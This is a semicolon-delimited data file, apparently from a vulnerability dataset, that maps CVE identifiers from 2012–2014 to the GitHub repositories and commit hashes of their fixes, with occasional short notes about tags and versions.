-CVE-2012-3536;https://github.com/apache/james-hupa;None:None;False;aff28a8117a49969b0fc8cc9926c19fa90146d8d; -CVE-2012-3865;https://github.com/puppetlabs/puppet;None:None;False;d80478208d79a3e6d6cb1fbc525e24817fe8c4c6,554eefc55f57ed2b76e5ee04d8f194d36f6ee67f; -CVE-2012-3867;https://github.com/puppetlabs/puppet;None:None;False;f3419620b42080dad3b0be14470b20a972f13c50,bd2820ec6ee8a45f57fcc57f79dddde0062cdca7,4d7c9fd9f65c6daaf47515d2faec90b448e3821d,dfedaa5fa841ccf335245a748b347b7c7c236640,0144e687b663a9ae170a4cdb55f8dcc1571128ea,9607bd784b2f04b759932d36e843ba42d82635f1; -CVE-2012-4386;https://github.com/apache/struts;None:None;False;a1ca307981b0930d1687ed89f0b7305af79da0f3,1081c52be93abfd2f33ba8453c676e3edcedec8b; one commit outside time interval, other not included in the tag, use STRUTS_2_3_4_1 -CVE-2012-4387;https://github.com/apache/struts;None:None;False;87935af56a27235e9399308ee1fcfb74f8edcefa,80e03182d66d9e6ab18f9a9a9b3c42725a1c89e9; one commit outside time interval, other not included in the tag, use STRUTS_2_3_4_1 -CVE-2012-4449;https://github.com/apache/hadoop;None:None;False;2847693311ed09aa9440a6157f1a8c072d50ca2e,38ec8babda50215f984e5f5532ae70918af77378,d6b7f10438677507fbe1adadec28d219889eab5b; -CVE-2012-4520;https://github.com/django/django;None:None;False;9305c0e12d43c4df999c3301a1f0c742264a657e,b45c377f8f488955e0c7069cad3f3dd21910b071,92d3430f12171f16f566c9050c40feefb830a4a3; -CVE-2012-5055;https://github.com/spring-projects/spring-security;None:None;False;f5fc94e1be40f3a62dd5a8687e4cfd5fe2130dea,915b2acf73a75c4e51e67a3c7fd85f908df6259b,c076f0f2e190c73a17379d05935c2c81657adee9; -CVE-2012-5633;https://github.com/apache/cxf;None:None;False;1a6b532d53a7b98018871982049e4b0c80dc837c,db11c9115f31e171de4622149f157d8283f6c720,d99f96aa970d9f2faa8ed45e278a403af48757ae,e733c692e933a7f82424d3744aace9304cd5d4f6,94a98b3fe9c79e2cf3941acbbad216ba54999bc0; -CVE-2012-5812;https://github.com/ACRA/acra;None:None;False;fff732595164baf233d911386a3965dc516cf081; -CVE-2012-6550;https://github.com/zeroclipboard/zeroclipboard;None:None;False;51b67b6d696f62aaf003210c08542588222c4913; -CVE-2012-6662;https://github.com/jquery/jquery-ui;None:None;False;5fee6fd5000072ff32f2d65b6451f39af9e0e39e,f2854408cce7e4b7fc6bf8676761904af9c96bde; -CVE-2012-6684;https://github.com/jgarber/redcloth;None:None;False;cddd03b87fe75b6681405066796bf4ef88b37149,b9bec13a245481f577c032a7df88513869b4d1b1,2f6dab4d6aea5cee778d2f37a135637fe3f1573c,39700cb12b2b882b1bd4900877d18059c31bbe04; -CVE-2012-6685;https://github.com/sparklemotion/nokogiri;None:None;False;599856367150709497a3a03bee930bd76504d95d,6d93d73498ed061dec5967d6471cd544c2b99a71,b2c28099ecb736d2fac4446fb062cfa20dd81d6f; -CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; -CVE-2013-0248;https://github.com/apache/commons-fileupload;None:None;False;f874563307c1159ac634df67509d9859bca6ddb9; -CVE-2013-0256;https://github.com/ruby/rdoc;None:None;False;ffa87887ee0517793df7541629a470e331f9fe60; -CVE-2013-0262;https://github.com/rack/rack;None:None;False;6f237e4c9fab649d3750482514f0fde76c56ab30,8de3c1d9902f8e64a385f38cf5711f26ffba19db,5c9b0de3d30971a36e953e6fed24e648daf3a68c; -CVE-2013-0263;https://github.com/rack/rack;None:None;False;9a81b961457805f6d1a5c275d053068440421e11,feea59c1abacd455c222bfee67541b1078378929,dcc7e6fa5106e1e8129f4bbe21f7e1607dbf5197,26c8500e9c49a0e625e1bd8d7158cabdfa2e17ae,aeb1c8d0fa1bfa21357cfe6d55898dedf3b337e1,0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07,a227999ab37cde072fa75495cd1d3bbcbcaf0474,6c39dfc8e8d8d631730449516cddb9b23a24337c,8748d492a4bc966de51f2ddf8edd498a3fa0e122,93abac98b13a0afa90293e4ec597cf505d46a343,471a37c15ad1b8b4a3bdfb190a5bf7aa770ec6d3; -CVE-2013-0285;https://github.com/savonrb/nori;None:None;False;818f5263b1d597b603d46cbe1702cd2717259e32,d9b68667249b98776fb23ba9e9c548dc4b524709,2ca6f8603e406f884a8fcea6bc26f8f6bf168f40; -CVE-2013-0294;https://github.com/pyradius/pyrad;None:None;False;38f74b36814ca5b1a27d9898141126af4953bee5; -CVE-2013-1607;https://github.com/pdfkit/pdfkit;None:None;False;ce37ffcdb223b34dd215971e2cd365e3a66cb5f1; -CVE-2013-1654;https://github.com/puppetlabs/puppet;None:None;False;be920acdb4762f6d813a29065ba210aef3ef612a,add9998c2f7c49c1eabf846566c0272a5f931f45,52be043933d40aab3449214f2aa602ceb214f91e; -CVE-2013-1800;https://github.com/jnunemaker/crack;None:None;False;e3da1212a1f84a898ee3601336d1dbbf118fb5f6; -CVE-2013-1801;https://github.com/jnunemaker/httparty;None:None;False;53a812426dd32108d6cba4272b493aa03bc8c031; -CVE-2013-1812;https://github.com/openid/ruby-openid;None:None;False;a3693cef06049563f5b4e4824f4d3211288508ed,be2bab5c21f04735045e071411b349afb790078f,3540a51e6f2f7fc7033f906fbd0a6c5153155e5a; -CVE-2013-1879;https://github.com/apache/activemq;None:None;False;148ca81dcd8f14cfe2ff37012fd1aa42518f02dc; -CVE-2013-1880;https://github.com/apache/activemq;None:None;False;fafd12dfd4f71336f8e32c090d40ed1445959b40; -CVE-2013-2013;https://github.com/openstack/python-keystoneclient;None:None;False;f2e0818bc97bfbeba83f6abbb07909a8debcad77; -CVE-2013-2035;https://github.com/fusesource/hawtjni;None:None;False;92c266170ce98edc200c656bd034a237098b8aa5; -CVE-2013-2115;https://github.com/apache/struts;None:None;False;fed4f8e8a4ec69b5e7612b92d8ce3e476680474b,d7804297e319c7a12245e1b536e565fcea6d6503; -CVE-2013-2132;https://github.com/mongodb/mongo-python-driver;None:None;False;a060c15ef87e0f0e72974c7c0e57fe811bbd06a2,842e675299318e02d8d223c458df87c029f66efc,7395ce72bf54ef64d723e1b4140556ebd12a2a07,d9b088e6d8a8b5f71acff10b6a13ba2b22fca718; -CVE-2013-2134;https://github.com/apache/struts;None:None;False;54e5c912ebd9a1599bfcf7a719da17c28127bbe3,01e6b251b4db78bfb7971033652e81d1af4cb3e0,cfb6e9afbae320a4dd5bdd655154ab9fe5a92c16,711cf0201cdd319a38cf29238913312355db29ba; -CVE-2013-2135;https://github.com/apache/struts;None:None;False;54e5c912ebd9a1599bfcf7a719da17c28127bbe3,01e6b251b4db78bfb7971033652e81d1af4cb3e0,cfb6e9afbae320a4dd5bdd655154ab9fe5a92c16,711cf0201cdd319a38cf29238913312355db29ba; -CVE-2013-2172;https://github.com/apache/santuario-java;None:None;False;a6795ec8148c1f91d8633694599ce34a5c06050d; -CVE-2013-2191;https://github.com/python-bugzilla/python-bugzilla;None:None;False;a782282ee479ba4cc1b8b1d89700ac630ba83eef; -CVE-2013-2254;https://github.com/apache/sling-org-apache-sling-servlets-post;None:None;False;57091b9bb7699fdc8dfb900b0e9b01bb0a848e4b,7ddd5df1282a47a99af1f7f4897fc7abe1ec056b; -CVE-2013-2275;https://github.com/puppetlabs/puppet;None:None;False;b9023b0c919312df648e424f392aa88c9b081599,a52013709b708ed346ea612f85e2b97d96fa66e2,e01e61e8909ec3ad4c873905a4dd9b952e3f4009,632e12d24d460b6dfd5cd3b65b2ad6397f2a2193; -CVE-2013-3300;https://github.com/lift/framework;None:None;False;099d9c86cf6d81f4953957add478ab699946e601; -CVE-2013-3567;https://github.com/puppetlabs/puppet;None:None;False;ce50d4ab992efdd1edd138d2a0eb6987213dcad1; -CVE-2013-4002;https://github.com/apache/xerces2-j;None:None;False;266e837852e0f0e3c8c1ad572b6fc4dbb4ded17b; -CVE-2013-4111;https://github.com/openstack/python-glanceclient;None:None;False;822cd64c0718b46a065abbb8709f6b466d12e708; -CVE-2013-4116;https://github.com/npm/npm;None:None;False;f4d31693e73a963574a88000580db1a716fe66f1; -CVE-2013-4152;https://github.com/spring-projects/spring-framework;None:None;False;7576274874deeccb6da6b09a8d5bd62e8b5538b7,434735fbf6e7f9051af2ef027657edb99120b173,2c030d4dcf4866bccc7a59d47398d6bc0de52ce2,3515acfa3db84bb62ef8ef8794a214c0d55fd47e; -CVE-2013-4204;https://github.com/gwtproject/gwt;None:None;False;4b1e5710d184205116e0e144b4501feb998e40b6; vulnerable tag is fixed -CVE-2013-4249;https://github.com/django/django;None:None;False;cbe6d5568f4f5053ed7228ca3c3d0cce77cf9560,90363e388c61874add3f3557ee654a996ec75d78,bfbae15c669beab335400ab51a060e3d7d8e4c7a; -CVE-2013-4251;https://github.com/scipy/scipy;None:None;False;bd296e0336420b840fcd2faabb97084fd252a973,27f8ed3839a74c2c9a92455ae5ab139d63201133,a05353d4511a1d86254d6b0a577d87c6715114e2; -CVE-2013-4286;https://github.com/apache/tomcat80;None:None;False;f0a7dc325201131ed31211c503c3a23714d8244f,bcce3e4997a4ed06fe03e2517443f3ad8ade2dfa,41b90b6ebc3e7f898a5a87d197ddf63790d33315; the two last commits were from tomcat standard repo, not tomcat80. Also not included in RC3 and RC2 is already fixed. -CVE-2013-4316;https://github.com/apache/struts;None:None;False;58947c3f85ae641c1a476316a2888e53605948d1; -CVE-2013-4322;https://github.com/apache/tomcat80;None:None;False;d85d0d1764259b62db0374f01df4bf6dddb12712,c806b2fc6b04ca4e928b3467d94f30f20c820d9d; vulnerable tag is fixed -CVE-2013-4353;https://github.com/openssl/openssl;None:None;False;197e0ea817ad64820789d86711d55ff50d71f631,8d65fdb62e517281350372775b5f93fcc8489681,2f972419a324761783e251dbdc735065bff88ac8; -CVE-2013-4413;https://github.com/zombocom/wicked;None:None;False;fe31bb2533fffc9d098c69ebeb7afc3b80509f53; -CVE-2013-4428;https://github.com/openstack/glance;None:None;False;a50bfbf490fd354d08abd25b67aaab83b2a17a85,feb735412021b771d4fe8b5706506abe6677899b,02e97689e60b643d446720659c9688702aea197b; if using 2013.2 shound find it. The 2013.1.4 tag is nowhere in the commits -CVE-2013-4477;https://github.com/openstack/keystone;None:None;False;c6800ca1ac984c879e75826df6694d6199444ea0,4221b6020e6b0b42325d8904d7b8a22577a6acc0,82dcde08f60c45002955875664a3cf82d1d211bc; -CVE-2013-4562;https://github.com/simi/omniauth-facebook;None:None;False;ccfcc26fe7e34acbd75ad4a095fd01ce5ff48ee7; -CVE-2013-4701;https://github.com/openid/php-openid;None:None;False;625c16bb28bb120d262b3f19f89c2c06cb9b0da9; -CVE-2013-4761;https://github.com/puppetlabs/puppet;None:None;False;a177c9d333b052c4d81d09ae2538bd5393612c69,13a3048994b19e22c13ac32da8eb15af5cfea954; commits have no tags -CVE-2013-5093;https://github.com/graphite-project/graphite-web;None:None;False;c198e5836970f0970b96498fcbe6fa83d90110cf,4a9f98647be279a39a982bd94922fdec710b0b3f; -CVE-2013-5123;https://github.com/pypa/pip;None:None;False;c2b799df9cd9bd9fcc124f6729d56b3180c813e8,3ef4ee4693db5e255dcfef1acf73427f6c97646b,dc559473e2667de130cd3ed4d57c4e125ee10d93; -CVE-2013-6044;https://github.com/django/django;None:None;False;1a274ccd6bc1afbdac80344c9b6e5810c1162b5f,ec67af0bd609c412b76eaa4cc89968a2a8e5ad6a,ae3535169af804352517b7fea94a42a1c9c4b762,79594b40c087c19fecc72af042c835b11a519b78; -CVE-2013-6235;https://github.com/stevensouza/jamonapi;None:None;False;05e6be6849abade047056c25ece23d9553deb3f3; -CVE-2013-6348;https://github.com/apache/struts;None:None;False;fd27e5cc748420a53d51e0e19a10efe8c582c2c0,01584fabc74635d63a1b2670f18d8fcd1ee046cc; -CVE-2013-6429;https://github.com/spring-projects/spring-framework;None:None;False;2ae6a6a3415eebc57babcb9d3e5505887eda6d8a,7387cb990e35b0f1b573faf29d4f9ae183d7a5ef; -CVE-2013-6430;https://github.com/spring-projects/spring-framework;None:None;False;f5c9fe69a444607af667911bd4c5074b5b073e7b,7a7df6637478607bef0277bf52a4e0a03e20a248; -CVE-2013-6465;https://github.com/kiegroup/jbpm-wb;None:None;False;4818204506e8e94645b52adb9426bedfa9ffdd04; -CVE-2013-7315;https://github.com/frankneusource/spring-framework;None:None;False;7576274874deeccb6da6b09a8d5bd62e8b5538b7,434735fbf6e7f9051af2ef027657edb99120b173; -CVE-2013-7370;https://github.com/senchalabs/connect;None:None;False;277e5aad6a95d00f55571a9a0e11f2fa190d8135,126187c4e12162e231b87350740045e5bb06e93a; -CVE-2013-7378;https://github.com/github/hubot-scripts;None:None;False;feee5abdb038a229a98969ae443cdb8a61747782; -CVE-2013-7397;https://github.com/AsyncHttpClient/async-http-client;None:None;False;df6ed70e86c8fc340ed75563e016c8baa94d7e72,dfacb8e05d0822c7b2024c452554bd8e1d6221d8; -CVE-2013-7398;https://github.com/AsyncHttpClient/async-http-client;None:None;False;a894583921c11c3b01f160ada36a8bb9d5158e96,bbdc1b3cc6ffc0eda0dd0ad54557db557ae937f7,fa056c572ab0c9b6edd05a7cc508898f35cc90d5,db6716ad2f10f5c2d5124904725017b2ba8c3434,3c9152e2c75f7e8b654beec40383748a14c6b51b; -CVE-2013-7459;https://github.com/pycrypto/pycrypto;None:None;False;8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4; -CVE-2014-0012;https://github.com/pallets/jinja;None:None;False;acb672b6a179567632e032f547582f30fa2f4aa7,964c61ce79f6748ff8c583e2eb12ec54082bf188; -CVE-2014-0014;https://github.com/emberjs/ember.js;None:None;False;d9977d62b26534555c0708acde0e7ae029e6d8ea,e52e047305849756c78abc1e760d621531c2c0a7,12fa46ba1c6efb9ddac7bfdef7f4f6909781c801,c80748313f93757b28f2bd3bd3d594e1e8e03d80,cc6cd6c1115e9f3f3ff2efa22dcb84080f7d4856,18f7d8a4159a707290ec9d09722aa4c39dfeb10a; -CVE-2014-0035;https://github.com/apache/cxf;None:None;False;5df3f72f1a26b7c9ac2888ab65e41f4105706580,2d2fd1bf67dc2247b6aca31b83a571d865fad1c9,d249721708694cbb0f431c0658166ebdcb02ec15; -CVE-2014-0050;https://github.com/apache/commons-fileupload;None:None;False;c61ff05b3241cb14d989b67209e57aa71540417a; -CVE-2014-0072;https://github.com/apache/cordova-plugin-file-transfer;None:None;False;a1d6fc07e8a40c1b2b16f4103c403b30e1089668; -CVE-2014-0073;https://github.com/apache/cordova-plugin-inappbrowser;None:None;False;26702cb0720c5c394b407c23570136c53171fa55; -CVE-2014-0075;https://github.com/apache/tomcat80;None:None;False;d49a03728ac7e3c800b1b0ce0eeccd8a5a21bb91,f646a5acd5e32d6f5a2d9bf1d94ca66b65477675,b6974571c122f6a1e7ec74a90fa212976fa7b0ed; -CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; -CVE-2014-0097;https://github.com/spring-projects/spring-security;None:None;False;88559882e967085c47a7e1dcbc4dc32c2c796868,a7005bd74241ac8e2e7b38ae31bc4b0f641ef973,7dbb8e777ece8675f3333a1ef1cb4d6b9be80395; -CVE-2014-0107;https://github.com/apache/xalan-j;None:None;False;52c27d504ced40719d243a8715d7f67d531723da,cbfd906cc5a1f1566fa1a98400c82e56077fae0c; -CVE-2014-0109;https://github.com/apache/cxf;None:None;False;f8ed98e684c1a67a77ae8726db05a04a4978a445,6dd839afbb4d834ed668738bd89e7775c1cf2f9d; -CVE-2014-0110;https://github.com/apache/cxf;None:None;False;8f4799b5bc5ed0fe62d6e018c45d960e3652373e,643b1bc7320ca90c3e078e50509f9a30a0ab45be,35cd29270b77b489cb23552637d66d47ce480f4c; -CVE-2014-0116;https://github.com/apache/struts;None:None;False;1a668af7f1ffccea4a3b46d8d8c1fe1c7331ff02; vulnerable tag is fixed -CVE-2014-0120;https://github.com/hawtio/hawtio;None:None;False;b4e23e002639c274a2f687ada980118512f06113; -CVE-2014-0121;https://github.com/hawtio/hawtio;None:None;False;5289715e4f2657562fdddcbad830a30969b96e1e; -CVE-2014-0160;https://github.com/openssl/openssl;None:None;False;96db9023b881d7cd9f379b0c154650d6c108e9a3; -CVE-2014-0177;https://github.com/github/hub;None:None;False;016ec99d25b1cb83cb4367e541177aa431beb600; -CVE-2014-0193;https://github.com/netty/netty;None:None;False;48edb7802b42b0e2eb5a55d8eca390e0c9066783,787a85f9f1b816ee901c1ec00348ae2007bb9d3b,8599ab5bdb761bb99d41a975d689f74c12e4892b,73b26b7c2598f36196b760ec590eefd37c8db62a,dfbd8e881980677bc21b5a53b80c8555061ffa84,cab1fa22ff43f604cc11631d5fccfa3e9231399a,93fab1d5a3a45a8104e560118930c1d652dce8cb; -CVE-2014-0224;https://github.com/openssl/openssl;None:None;False;bc8923b1ec9c467755cd86f7848c50ee8812e441,410a49a4fa1d2a1a9775ee29f9e40cbbda79c149,006cd7083f76ed5cb0d9a914857e9231ef1bc317; -CVE-2014-0225;https://github.com/spring-projects/spring-framework;None:None;False;44ee51a6c9c3734b3fcf9a20817117e86047d753,c6503ebbf7c9e21ff022c58706dbac5417b2b5eb,8e096aeef55287dc829484996c9330cf755891a1; -CVE-2014-0228;https://github.com/apache/hive;None:None;False;c3d7083b7605d1753946c4c4411e3a3241ea7ffe; 0.13.1 did not include the commit -CVE-2014-1202;https://github.com/SmartBear/soapui;None:None;False;6373165649ad74257493c69dbc0569caa7e6b4a6; -CVE-2014-1402;https://github.com/pallets/jinja;None:None;False;964c61ce79f6748ff8c583e2eb12ec54082bf188,acb672b6a179567632e032f547582f30fa2f4aa7; -CVE-2014-1403;https://github.com/oyvindkinsey/easyXDM;None:None;False;a3194d32c25a0d27a10a47304eb9c9be93ffbf13; -CVE-2014-1604;https://github.com/alex/rply;None:None;False;fc9bbcd25b0b4f09bbd6339f710ad24c129d5d7c; -CVE-2014-1829;https://github.com/psf/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,d9f34c6848b9b313beefa7d3ce05f52fdea28c27,326a22e8880c1dba52698a479eb7b6038d5b2e87; -CVE-2014-1830;https://github.com/psf/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,d9f34c6848b9b313beefa7d3ce05f52fdea28c27,326a22e8880c1dba52698a479eb7b6038d5b2e87,4d8cb3244e8e4f84b250c10a48e025f9a8bf6137; -CVE-2014-1832;https://github.com/phusion/passenger;None:None;False;94428057c602da3d6d34ef75c78091066ecac5c0,34b1087870c2bf85ebfd72c30b78577e10ab9744; -CVE-2014-1858;https://github.com/numpy/numpy;None:None;False;c7a30d538ba4c984d6f97b613486a3738b2c7922,961c43da78bf97ce63183b27c338db7ea77bed85,0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; -CVE-2014-1859;https://github.com/numpy/numpy;None:None;False;961c43da78bf97ce63183b27c338db7ea77bed85,c7a30d538ba4c984d6f97b613486a3738b2c7922,0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; -CVE-2014-1869;https://github.com/zeroclipboard/zeroclipboard;None:None;False;2f9eb9750a433965572d047e24b0fc78fd1415ca,eebdfa425ca2525f3b363cdc9e50bcfbcc35a2e6; -CVE-2014-1904;https://github.com/spring-projects/spring-framework;None:None;False;741b4b229ae032bd17175b46f98673ce0bd2d485; -CVE-2014-1932;https://github.com/python-pillow/Pillow;None:None;False;4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7,e9fe13da153be962e283937547a78c78f6ca81ff,1e331e3e6a40141ca8eee4f5da9f74e895423b66,844ed441deb6b75d3048fa111977188ed47f0b76,86d5c5c3894f58895f31287081cdd146f5fe00f7; -CVE-2014-1933;https://github.com/python-pillow/Pillow;None:None;False;1e331e3e6a40141ca8eee4f5da9f74e895423b66,4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7,e9fe13da153be962e283937547a78c78f6ca81ff,844ed441deb6b75d3048fa111977188ed47f0b76,86d5c5c3894f58895f31287081cdd146f5fe00f7; -CVE-2014-2053;https://github.com/JamesHeinrich/getID3;None:None;False;afbdaa044a9a0a9dff2f800bd670e231b3ec99b2,dc8549079a24bb0619b6124ef2df767704f8d0bc; -CVE-2014-2235;https://github.com/ASKBOT/askbot-devel;None:None;False;a676a86b6b7a5737d4da4f59f71e037406f88d29,876e3662ff6b78cc6241338c15e3a0cb49edf4e2; -CVE-2014-2525;https://github.com/yaml/libyaml;None:None;False;d1003a9d40b674520934f4f38ffc4ff2a809bc2d; -CVE-2014-2538;https://github.com/chopmo/rack-ssl;None:None;False;d99a9b403eb0cc7acbfa380daa501186e370583f,9d7d7300b907e496db68d89d07fbc2e0df0b487b,94041c3e68bdca772715a353295dd53e42cf5ed0,7445c16f989d2e434235c2df4f6d99ebff10897d; wrong repo old (changed probably) -CVE-2014-3007;https://github.com/python-pillow/Pillow;None:None;False;1e331e3e6a40141ca8eee4f5da9f74e895423b66,4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7; is pillow 2.3:2.4 -CVE-2014-3120;https://github.com/elastic/elasticsearch;None:None;False;95bd04b2c7fd7387c7e3b3367361dcf9fe9f9d06; -CVE-2014-3250;https://github.com/puppetlabs/puppet;None:None;False;b02af7e05d9b9a3bc23474933d8d7f6cd6191158; -CVE-2014-3488;https://github.com/netty/netty;None:None;False;2fa9400a59d0563a66908aba55c41e7285a04994; -CVE-2014-3505;https://github.com/openssl/openssl;None:None;False;bff1ce4e6a1c57c3d0a5f9e4f85ba6385fccfe8b,1b7024fb69161619855d86b80ae0681ea802e245,84361b898d456220039bc8b292f7b0ba70224a26,2172d4f63c61922487008f42511cc6bdae9b47a0,49850075555893c9c60d5b981deb697f3b9515ea; -CVE-2014-3506;https://github.com/openssl/openssl;None:None;False;1250f12613b61758675848f6600ebd914ccd7636,338a5e7e5458edf4cf754fd831a451fb4b57d180,934ca0714a686673695c055de86064f423984477,fc7804ec392fcf8051abe6bc9da9108744d2ae35,0598468fc04fb0cf2438c4ee635b587aac1bcce6; -CVE-2014-3509;https://github.com/openssl/openssl;None:None;False;fb0bc2b273bcc2d5401dd883fe869af4fc74bb21,03a12c1330575398cbdbd301b923af65bb7f4466,86788e1ee6908a5b3a4c95fa80caa4b724a8a434,92aa73bcbfad44f9dd7997ae51537ac5d7dc201e; -CVE-2014-3511;https://github.com/openssl/openssl;None:None;False;280b1f1ad12131defcd986676a8fc9717aaa601b,fc4bd2f287582c5f51f9549727fd5a49e9fc3012,67e53f73bf44ba354bac0fab1b38c6c596b49fc6,fc4f4cdb8bf9981904e652abf69b892a45bddacf,40a2200d89b2a559700cee95f1898312f993792a; -CVE-2014-3572;https://github.com/openssl/openssl;None:None;False;b15f8769644b00ef7283521593360b7b2135cb63,e42a2abadc90664e2615dc63ba7f79cf163f780a,ef28c6d6767a6a30df5add36171894c96628fe98,802a070bb6452dd9df49e550e0f3b16777e5232b,4aaf1e493cb86efa64f6a486a27d38da6bce23af; -CVE-2014-3576;https://github.com/apache/activemq;None:None;False;00921f22ff9a8792d7663ef8fadd4823402a6324; -CVE-2014-3577;https://github.com/apache/httpcomponents-client;None:None;False;51cc67567765d67f878f0dcef61b5ded454d3122; -CVE-2014-3578;https://github.com/spring-projects/spring-framework;None:None;False;8ee465103850a3dca018273fe5952e40d5c45a66,748167bfa33c3c69db2d8dbdc3a0e9da692da3a0,f6fddeb6eb7da625fd711ab371ff16512f431e8d; -CVE-2014-3579;https://github.com/apache/activemq-apollo;None:None;False;e5647554e6801a522c508a8eb457979a9af8c398; -CVE-2014-3599;https://github.com/hornetq/hornetq;None:None;False;b3a63576371828d5f8e64ba7ccbcecb1da8111d2; -CVE-2014-3600;https://github.com/apache/activemq;None:None;False;b9696ac80bb496b52d05c3884f81b0746d9af9e2,3e5ac6326db59f524a0e71f6b717428607d7b67d; -CVE-2014-3612;https://github.com/apache/activemq;None:None;False;22f2f3dde757d31307da772d579815c1d169bc39; -CVE-2014-3625;https://github.com/spring-projects/spring-framework;None:None;False;3f68cd633f03370d33c2603a6496e81273782601,9cef8e3001ddd61c734281a7556efd84b6cc2755,9beae9ae4226c45cd428035dae81214439324676; -CVE-2014-3630;https://github.com/playframework/playframework;None:None;False;656ee5a56bd7b2c7821d8dcb437688ae1deab1b7,97f9ddbb13d8f373e8088f4bb41cb2ccd6df9de7,b226583403179d815e8ae7e76c381b22a9a7c2e0; -CVE-2014-3709;https://github.com/keycloak/keycloak;None:None;False;bb132e1aa0b3b3a123883d0b8d0b788337df956d; -CVE-2014-3741;https://github.com/tojocky/node-printer;None:None;False;e001e38738c17219a1d9dd8c31f7d82b9c0013c7; -CVE-2014-3994;https://github.com/djblets/djblets;None:None;False;77a68c03cd619a0996f3f37337b8c39ca6643d6e,d3e428a6f7bc4c04d100b06e663c071fdc1717d9; -CVE-2014-3995;https://github.com/djblets/djblets;None:None;False;77ac64642ad530bf69e390c51fc6fdcb8914c8e7; -CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814; -CVE-2014-4657;https://github.com/ansible/ansible;None:None;False;998793fd0ab55705d57527a38cee5e83f535974c; -CVE-2014-4658;https://github.com/ansible/ansible;None:None;False;a0e027fe362fbc209dbeff2f72d6e95f39885c69,75e0b7a5cf805217a9365b995c5b99ed12aea5af; -CVE-2014-4678;https://github.com/ansible/ansible;None:None;False;5429b85b9f6c2e640074176f36ff05fd5e4d1916,b8b96b210915789745ece8ad04f1c1bfc1c72030; -CVE-2014-5277;https://github.com/docker/docker-py;None:None;False;537b4681403cd9dd29b753584e6c8317edf7ae3f; -CVE-2014-6394;https://github.com/pillarjs/send;None:None;False;9c6ca9b2c0b880afd3ff91ce0d211213c5fa5f9a; -CVE-2014-7143;https://github.com/twisted/twisted;None:None;False;3b5942252f5f3e45862a0e12b266ab29e243cc33; 15.0.0 did not include the commit -CVE-2014-7189;https://github.com/golang/go;None:None;False;247820ff6bfba6e1b7891f4bfc25511d68761d5d; -CVE-2014-7192;https://github.com/browserify/syntax-error;None:None;False;9aa4e66eb90ec595d2dba55e6f9c2dd9a668b309; -CVE-2014-7193;https://github.com/hapijs/crumb;None:None;False;5e6d4f5c81677fe9e362837ffd4a02394303db3c; -CVE-2014-7202;https://github.com/zeromq/libzmq;None:None;False;fe4396c597929382214c7966e60f025114d4f32d,77f14aad95cdf0d2a244ae9b4a025e5ba0adf01a; -CVE-2014-7203;https://github.com/zeromq/libzmq;None:None;False;e40d4b23762502c2de9bc2bc4817dfe2f33b8ed9,0900a489213d74feb86fc0b343308fe7884a2a3c; -CVE-2014-7205;https://github.com/outmoded/bassmaster;None:None;False;bece966a3106ee6a5506efc2f9bc32c379f54aa1,b751602d8cb7194ee62a61e085069679525138c4; -CVE-2014-7809;https://github.com/apache/struts;None:None;False;1f301038a751bf16e525607c3db513db835b2999; -CVE-2014-8115;https://github.com/kiegroup/kie-wb-distributions;None:None;False;90eed433d36b21265fdf978252b8619766b8e74b; -CVE-2014-8152;https://github.com/apache/santuario-xml-security-java;None:None;False;3d7086c603a4538933dfa98d697d0df4539a984f; -CVE-2014-8176;https://github.com/openssl/openssl;None:None;False;d52eb82781eff1f8245ae9c16c84db765f037cbe,470990fee0182566d439ef7e82d1abf18b7085d7,bcc311668ede6ffdcd6dc5a65454a548b5404fcc,b79e6e3a276634582012d531f4150a5fcf84fab3,4b258e73ae0da0f1a7ff3eb9840b6978711c2400; -CVE-2014-8547;https://github.com/FFmpeg/FFmpeg;None:None;False;8f1457864be8fb9653643519dea1c6492f1dde57,9ae3cd6e7271a3d6b8cd92a4d35ebb16d2e03f1a,02de44073a8e116ea177b53081219d32ef135ad8,0b39ac6f54505a538c21fe49a626de94c518c903,7f90eef87ac84c617b102b689eb68e7cb140167b; -CVE-2014-8548;https://github.com/FFmpeg/FFmpeg;None:None;False;c727401aa9d62335e89d118a5b4e202edf39d905,a331e11906b196c9a00f5ffbc45d80fcd7fe8423,306ee95088243fefa2dfcb5c355d439db75e2d2a,f249e9889155599ee3ad0172832d38f68b0c625d,d423dd72be451462c6fb1cbbe313bed0194001ab,c0c24bc9b32419c7883a344c74a6779374a3c16a; -CVE-2014-8549;https://github.com/FFmpeg/FFmpeg;None:None;False;550f3e9df3410b3dd975e590042c0d83e20a8da3,cee4490b521fd0d02476d46aa2598af24fb8d686,84d26ab6eb07e22ad6ffcd8109ca1d1a0cd57bce; -CVE-2014-8650;https://github.com/requests/requests-kerberos;None:None;False;208bebb7008796a07be0204d9b5beaa55d2373ae,9c1e08cc17bb6950455a85d33d391ecd2bce6eb6; -CVE-2014-8681;https://github.com/gogs/gogs;None:None;False;83283bca4cb4e0f4ec48a28af680f0d88db3d2c8; -CVE-2014-8682;https://github.com/gogs/gogs;None:None;False;0c5ba4573aecc9eaed669e9431a70a5d9f184b8d; -CVE-2014-8991;https://github.com/pypa/pip;None:None;False;043fe9f5700315d97f83609c1f59deece8f1b901,01610be0d58bc428646126090cb2905cf219b2f4; -CVE-2014-9130;https://github.com/yaml/libyaml;None:None;False;e6aa721cc0e5a48f408c52355559fd36780ba32a; -CVE-2014-9489;https://github.com/gollum/grit_adapter;None:None;False;4520d973c81fecfebbeacd2ef2f1849d763951c7; -CVE-2014-9682;https://github.com/skoranga/node-dns-sync;None:None;False;d9abaae384b198db1095735ad9c1c73d7b890a0d; 